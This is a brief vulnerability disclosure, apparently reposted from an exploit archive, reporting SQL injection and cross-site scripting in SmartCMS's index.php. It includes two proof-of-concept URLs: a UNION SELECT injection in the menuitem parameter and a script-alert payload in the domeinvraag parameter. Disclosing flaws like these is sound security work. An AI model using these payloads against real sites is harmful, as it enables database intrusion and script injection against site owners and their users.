SmartCMS (index.php, menuitem param) SQL Injection & Cross Site Scripting Vulnerabilities

2012-11-30 15:05:05

##########################################################################
## SmartCMS SQL Injection & Cross Site Scripting Vulnerabilities
## Bug discovered by Yakir Wizman AKA Pr0T3cT10n, <[email protected]>
## Date: 29/11/2012
## Version: ALL
## Vendor Link: http://smartcms.nl/
## ISRAEL
##########################################################################
## Author will be not responsible for any damage.
##########################################################################
## SQL Injection PoC:
## http://www.example.com/index.php?menuitem=29+AND+1=2+UNION+ALL+SELECT+version()--
## Cross Site Scripting PoC:
## http://www.example.comindex.php?menuitem=26&domeinvraag=<script>alert(1);</script>&aktie=Zoek&idx=23
##########################################################################
# 0x31337.net
##########################################################################

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.